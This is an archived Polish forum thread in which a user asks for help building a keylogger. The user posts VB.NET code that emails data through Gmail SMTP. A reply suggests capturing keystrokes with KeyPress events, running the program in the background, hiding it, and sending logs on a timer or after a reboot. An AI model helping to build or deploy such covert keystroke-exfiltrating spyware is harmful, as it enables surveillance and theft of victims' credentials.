Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Przechwytywanie i zapisywanie klawiatury


JimForce

Rekomendowane odpowiedzi

Opublikowano

Witam, prosiłbym aby ktoś wytłumaczył jak przechwycić i zapisać klawisze klawiatury , a następnie je wysyłać.

Tworzę keylogger , który wysyła wiadomości 

    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        Try
            Dim Smtp_Server As New SmtpClient
            Dim e_mail As New MailMessage()
            Smtp_Server.UseDefaultCredentials = False
            Smtp_Server.Credentials = New Net.NetworkCredential("email", "haslo")
            Smtp_Server.Port = 587
            Smtp_Server.EnableSsl = True
            Smtp_Server.Host = "smtp.gmail.com"

            e_mail = New MailMessage()
            e_mail.From = New MailAddress("email")
            e_mail.To.Add("odbiorca")
            e_mail.Subject = TextBox1.Text
            e_mail.IsBodyHtml = False
            e_mail.Body = TextBox2.Text
            Smtp_Server.Send(e_mail)

ale nie wiem jak zrobić , aby przechwycić klawisze przynajmniej z textboxu. Z góry dziękuję.

Uważam, że poziom mojej inteligencji nie przekracza poziomu inteligencji przeciętnego człowieka.

Opublikowano

Pobaw się z:

 

1.event Keypress http://vb.net-informations.com/gui/key-press-vb.htm

2-gi link do tuta: https://msdn.microsoft.com/pl-pl/library/system.windows.forms.control.keypress(v=vs.110).aspx

 

2.i do tego: http://www.visual-basic-tutorials.com/Tutorials/Controls/BackGroundWorker.htm

2-gi link do tuta: https://msdn.microsoft.com/en-us/library/system.componentmodel.backgroundworker(v=vs.110).aspx

 

1.Keypress - przechwytywanie klawiatury

2.BackgroundWorker - by program działał w tle

 

pozostaje jeszcze tylko jego ukrycie, nie oczekuj gotowego kodu ;)

 

 

@Edit

Jeśli chodzi o programy typu keylogger, na twoim miejscu użył bym zdarzenia typu timer ustawiony np, co 15-min, 1h lub:

    Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs) Handles Me.FormClosing
        //kod
    End Sub

by wysyłało "raporty" przed zamknięciem programu, lecz jesli chodzi o e-maile to i tak lepiej było by użyć zapisania tekstu na dysku i wysłanie go dopiero po ponownym wlączeniu systemu

sygna.png

  • 2 miesiące temu...
Opublikowano

ref

Uważam, że poziom mojej inteligencji nie przekracza poziomu inteligencji przeciętnego człowieka.

  • 2 tygodnie później...
  • 1 rok później...

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...